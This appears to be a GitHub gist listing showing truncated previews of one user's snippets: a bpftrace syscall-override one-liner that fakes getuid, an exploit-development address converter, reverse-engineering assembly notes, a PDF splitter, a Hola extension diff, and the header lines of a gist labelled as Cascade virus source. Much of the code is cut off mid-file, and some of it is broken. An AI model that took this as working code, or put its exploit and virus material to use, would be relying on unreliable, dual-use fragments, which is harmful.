🎿
NOP Sledding

Jameel RC1140

sudo bpftrace -e 'k:__x64_sys_getuid /comm == "id"/ { override(99); }' --unsafe -c /usr/bin/id
@RC1140
RC1140 / gist:d0008fab2ed0d01859ef
Created September 16, 2014 17:09
splitDocument.py
from PyPDF2 import PdfFileWriter, PdfFileReader
input1 = PdfFileReader(open("fileToSplit.pdf", "rb"))
for i in range(input1.numPages):
    # Write each page of the input to its own single-page PDF
    output = PdfFileWriter()
    output.addPage(input1.getPage(i))
    outputStream = open('review' + str(i) + '.pdf', "wb")
    output.write(outputStream)
    outputStream.close()
@RC1140
RC1140 / convertToLitteEndian.py
Created December 5, 2013 12:56
Converts a memory address to little endian, useful for exploits and such; also prints the format used in an exploit.
import sys
if len(sys.argv) == 1:
    sys.exit(-1)
memAddress = sys.argv[1]#'bffffe65'#
start = len(memAddress)
print(memAddress)
outAddress = ''
hexAddress = ''
for i in range(len(memAddress),0,-2):
    start -= 2
_f proc near
var_10 = dword ptr -10h
var_9 = byte ptr -9
input = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
jmp short loc_8048410
loc_804840C:
add [ebp+input], 4
@RC1140
RC1140 / cascade.asm
Created March 17, 2013 20:16
Source code for the cascade virus
PAGE 62,132
TITLE _HLV_
SUBTTL Layout (C) 1990 164A12565AA18213165556D3125C4B962712
.RADIX 16
.LALL
TRUE EQU 1
FALSE EQU 0
MONTH EQU 9D
char toupper ( char c )
{
    if( c >= 'a' && c <= 'z' ) {
        c = c - 'a' + 'A';
    }
    return( c );
}
@RC1140
RC1140 / task1.1.asm
Last active December 15, 2015 01:38
_f proc near
input = dword ptr 8
push ebp ;Stack winding , remember where we came from.
mov ebp, esp ;Stack winding , update the current stack locations.
movzx eax, byte ptr [ebp+input] ; Move the byte value @ the address [ebp + input] and extend it if needed into the eax register
; eax now contains the first 8 bits of the stack for the current function which is your first parameter passed to the function
lea edx, [eax-61h] ; This subtracts 61h from eax (the parameter passed in ) and sets edx to the result.
; Assuming we passed in the letter 'a' , this would result in 61h - 61h == 0 in edx
cmp dl, 19h ; Compare the lower register of edx to 19h , if the value is less than 19h then
; we know we are dealing with lower case letters. Otherwise this is an upper case letter or some other char which means we can ignore it.
@RC1140
RC1140 / customTtyTterOutput.pl
Created February 21, 2013 20:23
Small little extension for ttytter that allows you to highlight the names of certain users. I also changed the way tweets are displayed to suit my liking. To use it run ttytter -exts=customTtyTterOutput.pl
use Term::ANSIColor;
#Open a text file with a list of users to highlight
open our $handle, '<', "/home/<your username>/tweetersToHighlight.txt";
chomp(our @customConsole.pl = <$handle>);
#Convert array to hash/dictionary
our %users = map { $_ => 1 } @customConsole.pl;
close $handle;
#Setup ttytter hook
$handle = sub {
@RC1140
RC1140 / hola.diff
Created January 30, 2013 20:27
Hola patch to remove remote calls and lower permissions requirements.
diff --cc manifest.json
index 984792c,06d9aad..0000000
--- a/manifest.json
+++ b/manifest.json
@@@ -5,9 -5,7 +5,13 @@@
"proxy",
"webRequest",
"webRequestBlocking",
++<<<<<<< HEAD
+ "<all_urls>",
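Review bot: the `++<<<<<<< HEAD` line in the manifest.json permissions list is an unresolved merge-conflict marker, so this is a conflicted combined diff (`diff --cc`) rather than a clean patch, and a manifest.json containing that marker is not valid JSON. Resolve the conflict and regenerate the diff before sharing it. Because the stated goal is to lower the permission requirements, check that the resolved permissions array does not keep the `"<all_urls>"` entry that appears on the HEAD side of the conflict.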
@RC1140
RC1140 / DynamicDNS.py
Last active October 8, 2015 07:29
DynamicDNS For Use With AmazonRoute53
#!/usr/bin/env python
import stun
import socket
import route53
domainName = ''#Make sure this is a FQDN i.e. it should have a '.' at the end.
access_id = ''
secret_key = ''
hostedZoneID = '' #Get this from your aws account